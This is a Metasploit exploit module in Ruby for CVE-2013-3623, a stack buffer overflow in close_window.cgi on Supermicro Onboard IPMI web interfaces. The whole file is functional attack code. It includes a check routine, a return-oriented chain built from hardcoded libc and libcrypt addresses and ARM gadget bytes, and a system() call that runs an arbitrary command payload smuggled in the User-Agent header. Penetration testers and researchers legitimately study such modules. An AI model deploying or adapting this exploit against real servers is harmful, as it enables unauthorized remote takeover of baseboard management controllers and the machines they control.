require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super (update_info(info,
'Name' => 'Supermicro Onboard IPMI close_window.cgi Buffer Overflow' ,
'Description' => %q{
This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web
interface. The vulnerability exists on the close_window.cgi CGI application, and is due
to the insecure usage of strcpy. In order to get a session, the module will execute
system() from libc with an arbitrary CMD payload sent on the User-Agent header. This
module has been tested successfully on Supermicro Onboard IPMI ( X9SCL / X9SCM ) with firmware
SMT_X9_214 .
},
'Author' =>
[
'hdm' ,
'juan vazquez'
],
'License' => MSF_LICENSE ,
'Payload' =>
{
'Space' => 8000 ,
'DisableNops' => true ,
'BadChars' => (0x00..0x1f).to_a.pack( "C*" ),
'Compat' =>
{
'PayloadType' => 'cmd' ,
'RequiredCmd' => 'generic openssl'
}
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD ,
'References' =>
[
[ 'CVE' , '2013-3623' ],
],
'Targets' =>
[
[ 'Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214' ,
{
:callback => :target_smt_x9_214
}
]
],
'DisclosureDate' => 'Nov 06 2013' ,
'DefaultTarget' => 0 ))
end
def send_close_window_request(sess, agent = rand_text_alpha( 8 ))
res = send_request_cgi({
'method' => 'POST' ,
'uri' => "/cgi/close_window.cgi" ,
'agent' => rand_text_alpha( 16 ) + agent,
'encode_params' => false ,
'vars_post' => {
'sess_sid' => sess
}
})
return res
end
def check
safe_check = rand_text_alpha( 20 )
trigger_check = rand_text_alpha( 132 )
res = send_close_window_request(safe_check)
unless res and res.code == 200 and res.body.to_s =~ /Can't find action/
return Exploit::CheckCode::Unknown
end
res = send_close_window_request(trigger_check)
unless res and res.code == 500
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def target_smt_x9_214
base_crypt = 0x40074000
base_libc = 0x40554000
buf = rand_text_alpha( 68 )
buf << rand_text_alpha( 4 )
buf << rand_text_alpha( 4 )
buf << rand_text_alpha( 4 )
buf << [base_crypt + 0x39598].pack( "V" )
buf << "\x68\xd0\x84\xe2"
offset = ssl ? 208 : 204
buf << [offset].pack( "C" ) + "\x50\x84\xe2"
buf << "\x70\x40\xb5\xe8"
buf << "\x20\x40\x84\xe2"
buf << "\x40\x80\xbd\xe8"
buf << rand_text_alpha( 4 )
buf << [ base_crypt + 0x3A8BC ].pack( "V" )
buf << rand_text_alpha( 4 )
buf << [ base_libc + 0x3617c ].pack( "V" )
buf << rand_text_alpha( 128 -buf.length)
buf << "\x80\x40\x44\xe2"
buf << "\x54\xf0\x84\xe2"
return buf
end
def exploit
buffer = self .send(target[ :callback ])
print_status( "#{peer} - Sending exploit..." )
send_close_window_request(buffer, payload.encoded)
end
end
|